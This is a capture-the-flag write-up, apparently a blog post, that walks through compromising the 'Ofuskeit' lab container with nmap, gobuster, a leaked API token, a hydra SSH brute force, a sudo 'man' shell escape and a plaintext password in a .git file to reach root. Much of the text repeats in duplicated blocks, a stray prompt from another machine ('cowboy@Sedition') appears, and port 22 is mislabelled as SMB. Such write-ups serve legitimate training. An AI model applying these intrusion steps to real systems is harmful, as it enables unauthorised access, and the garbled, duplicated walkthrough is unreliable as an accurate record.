OFUSKEIT MACHINE
OFUSKEIT
┌──(rootkali)-[/home/luis/Descargas/ofuskeit]
└─# bash auto_deploy.sh ofuskeit.tar
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed that ports 22 (SMB), 3000 (API) and 80 (HTTP) were open.
└─# bash auto_deploy.sh ofuskeit.tar
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed that ports 22 (SMB), 3000 (API) and 80 (HTTP) were open.
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 172.17.0.2 -vvv -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 13:36 CEST
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 13:36
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 13:36, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:36
Scanning 172.17.0.2 [65535 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 3000/tcp on 172.17.0.2
Completed SYN Stealth Scan at 13:36, 0.89s elapsed (65535 total ports)
Initiating Service scan at 13:36
Scanning 3 services on 172.17.0.2
Completed Service scan at 13:36, 11.04s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.03s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000050s latency).
Scanned at 2025-09-20 13:36:15 CEST for 13s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
3000/tcp open http syn-ack ttl 64 Node.js Express framework
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.44 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
With the web service identified on port 80, the next step was to search for hidden directories and files. The Gobuster tool was used with a common wordlist for this purpose as you can see below, but gobuster discovered an interesting directory named /api.js. This finding suggested the existence of a login panel that could be a target for a vulnerability.
┌──(root㉿kali)-[/home/luis]
└─# gobuster dir -u "http://172.17.0.2/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x bak,txt,php,tar,js
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: bak,txt,php,tar,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/api.js (Status: 200) [Size: 494]
/javascript (Status: 301) [Size: 313] [--> http://172.17.0.2/javascript/]
/script.js (Status: 200) [Size: 1916]
Progress: 1323342 / 1323342 (100.00%)
===============================================================
Finished
===============================================================
Now, we have discovered a website in this url which you can see in the picture below and then we have discovered differents forbidden web pages and home webpages below in the pictures.
Now, as we have discovered api.js we are going to do query to this webpage which you can see in the picture below in the.
└─# nmap -n -Pn -p- --min-rate 5000 172.17.0.2 -vvv -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 13:36 CEST
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 13:36
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 13:36, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:36
Scanning 172.17.0.2 [65535 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 3000/tcp on 172.17.0.2
Completed SYN Stealth Scan at 13:36, 0.89s elapsed (65535 total ports)
Initiating Service scan at 13:36
Scanning 3 services on 172.17.0.2
Completed Service scan at 13:36, 11.04s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.03s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000050s latency).
Scanned at 2025-09-20 13:36:15 CEST for 13s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
3000/tcp open http syn-ack ttl 64 Node.js Express framework
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.44 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
With the web service identified on port 80, the next step was to search for hidden directories and files. The Gobuster tool was used with a common wordlist for this purpose as you can see below, but gobuster discovered an interesting directory named /api.js. This finding suggested the existence of a login panel that could be a target for a vulnerability.
┌──(root㉿kali)-[/home/luis]
└─# gobuster dir -u "http://172.17.0.2/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x bak,txt,php,tar,js
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: bak,txt,php,tar,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/api.js (Status: 200) [Size: 494]
/javascript (Status: 301) [Size: 313] [--> http://172.17.0.2/javascript/]
/script.js (Status: 200) [Size: 1916]
Progress: 1323342 / 1323342 (100.00%)
===============================================================
Finished
===============================================================
Now, we have discovered a website in this url which you can see in the picture below and then we have discovered differents forbidden web pages and home webpages below in the pictures.
└─# curl http://172.17.0.2/api.js
const express = require('express');
const app = express();
const PORT = 3000;
const tokenValido = "EKL56L4K57657JÑ456J74K5Ñ6754";
app.use(express.json());
app.post('/api', (req, res) => {
const { token } = req.body;
if (token === tokenValido) {
return res.send("✅ Acceso concedido. Contraseña chocolate123");
} else {
return res.status(401).send("❌ Token inválido.");
}
});
app.listen(PORT, () => {
console.log(`🚀 API activa en http://localhost:${PORT}`);
});
Now, we have to execute the nect command as you can see in the picture below because we need obtain ✅ Acceso concedido. Contraseña chocolate123 as you can see below.
┌──(root㉿kali)-[/home/luis]
└─#curl -X POST -H "Content-Type:application/json" -d '{"token":"EKL56L4K57657JÑ456J74K5Ñ6754"}' http://172.17.0.2:3000/api
✅ Acceso concedido. Contraseña chocolate123
After we have discovered the ssh open port which is 22 we sholuld find out user with the hydra toolkit as you can see below.
┌──(root㉿kali)-[/home/luis]
└─#hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p chocolate123 ssh://172.17.0.2 -f
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-20 13:49:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: admin password: chocolate123
[STATUS] attack finished for 172.17.0.2 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-20 13:49:57
Gotcha! credentials are:
└─#hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p chocolate123 ssh://172.17.0.2 -f
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-20 13:49:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: admin password: chocolate123
[STATUS] attack finished for 172.17.0.2 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-20 13:49:57
Gotcha! credentials are:
- Username: admin
- Password: chocolate123
Now, we have to enter via ssh protocol with the next command which you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ssh admin@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:TiwXpOsqzY3iXCsLthm55nRfroyY7zk3fOjQi0lA2fQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
admin@172.17.0.2's password:
Linux 0417788a875e 6.12.38+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.12.38-1kali1 (2025-08-12) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
admin@0417788a875e:~$
admin@0417788a875e:~$ sudo -l
Matching Defaults entries for admin on 0417788a875e:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
In addition, we can discover with sudo -l command the escalate privilege as you can see below with the next steps:
└─# ssh admin@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:TiwXpOsqzY3iXCsLthm55nRfroyY7zk3fOjQi0lA2fQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
admin@172.17.0.2's password:
Linux 0417788a875e 6.12.38+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.12.38-1kali1 (2025-08-12) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
admin@0417788a875e:~$
admin@0417788a875e:~$ sudo -l
Matching Defaults entries for admin on 0417788a875e:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
In addition, we can discover with sudo -l command the escalate privilege as you can see below with the next steps:
- sudo -l (To listing perms)
- sudo -u "balulito" /usr/bin/man ls (To exploting vulnerability)
cowboy@Sedition:~$
User admin may run the following commands on 0417788a875e:
(balulito) NOPASSWD: /usr/bin/man
admin@0417788a875e:~$ sudo -u "balulito" /usr/bin/man ls
!/bin/bash
Gotcha! we have pivoted to other user
User admin may run the following commands on 0417788a875e:
(balulito) NOPASSWD: /usr/bin/man
admin@0417788a875e:~$ sudo -u "balulito" /usr/bin/man ls
!/bin/bash
Gotcha! we have pivoted to other user
admin@0417788a875e:~$ sudo -u "balulito" /usr/bin/man ls
/usr/bin/man: can't set the locale; make sure $LC_* and $LANG are correct
balulito@0417788a875e:/home/admin$
balulito@0417788a875e:/home/admin$ ls
ls: cannot open directory '.': Permission denied
balulito@0417788a875e:/home/admin$ cd ..
balulito@0417788a875e:/home$ ls
admin balulito
balulito@0417788a875e:/home$ cd admin/
bash: cd: admin/: Permission denied
balulito@0417788a875e:/home$ find / -perm -4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/mount
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
balulito@0417788a875e:/home$ cd ..
balulito@0417788a875e:/$ ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
balulito@0417788a875e:/var/www/html$ ls
api.js index.html node_modules package-lock.json package.json script.js style.css
balulito@0417788a875e:/var/www/html$ ls -la
total 64
drwxr-xr-x 3 root root 4096 Jun 1 08:32 .
drwxr-xr-x 3 root root 4096 Jun 1 08:10 ..
-rw-r--r-- 1 root root 318 Jun 1 08:28 .git
-rw-r--r-- 1 root root 494 Jun 1 08:32 api.js
-rw-r--r-- 1 root root 2129 Jun 1 08:13 index.html
drwxr-xr-x 68 root root 4096 Jun 1 08:23 node_modules
-rw-r--r-- 1 root root 27001 Jun 1 08:23 package-lock.json
-rw-r--r-- 1 root root 265 Jun 1 08:23 package.json
-rw-r--r-- 1 root root 1916 Jun 1 08:15 script.js
-rw-r--r-- 1 root root 2270 Jun 1 08:13 style.css
balulito@0417788a875e:/var/www/html$ find / -name .* 2>/dev/null
/var/www/html/.git
balulito@0417788a875e:/var/www/html$ cat .git
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/empresa/mi-app-segura.git
fetch = +refs/heads/*:refs/remotes/origin/*
[user]
name = balulito
email = admin@empresa.com
password = 'this is top secret'
balulito@0417788a875e:/var/www/html$
balulito@0417788a875e:/var/www/html$ su root
Gotcha! we are user root
/usr/bin/man: can't set the locale; make sure $LC_* and $LANG are correct
balulito@0417788a875e:/home/admin$
balulito@0417788a875e:/home/admin$ ls
ls: cannot open directory '.': Permission denied
balulito@0417788a875e:/home/admin$ cd ..
balulito@0417788a875e:/home$ ls
admin balulito
balulito@0417788a875e:/home$ cd admin/
bash: cd: admin/: Permission denied
balulito@0417788a875e:/home$ find / -perm -4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/mount
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
balulito@0417788a875e:/home$ cd ..
balulito@0417788a875e:/$ ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
balulito@0417788a875e:/var/www/html$ ls
api.js index.html node_modules package-lock.json package.json script.js style.css
balulito@0417788a875e:/var/www/html$ ls -la
total 64
drwxr-xr-x 3 root root 4096 Jun 1 08:32 .
drwxr-xr-x 3 root root 4096 Jun 1 08:10 ..
-rw-r--r-- 1 root root 318 Jun 1 08:28 .git
-rw-r--r-- 1 root root 494 Jun 1 08:32 api.js
-rw-r--r-- 1 root root 2129 Jun 1 08:13 index.html
drwxr-xr-x 68 root root 4096 Jun 1 08:23 node_modules
-rw-r--r-- 1 root root 27001 Jun 1 08:23 package-lock.json
-rw-r--r-- 1 root root 265 Jun 1 08:23 package.json
-rw-r--r-- 1 root root 1916 Jun 1 08:15 script.js
-rw-r--r-- 1 root root 2270 Jun 1 08:13 style.css
balulito@0417788a875e:/var/www/html$ find / -name .* 2>/dev/null
/var/www/html/.git
balulito@0417788a875e:/var/www/html$ cat .git
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/empresa/mi-app-segura.git
fetch = +refs/heads/*:refs/remotes/origin/*
[user]
name = balulito
email = admin@empresa.com
password = 'this is top secret'
balulito@0417788a875e:/var/www/html$
balulito@0417788a875e:/var/www/html$ su root
Gotcha! we are user root
Password:
root@0417788a875e:/var/www/html# whoami
root
Thank you very much for reading this article
root@0417788a875e:/var/www/html# whoami
root
Thank you very much for reading this article
I hope you liked and learned something new
This article has been done with ethical proposes
Good Hack
Comments
Post a Comment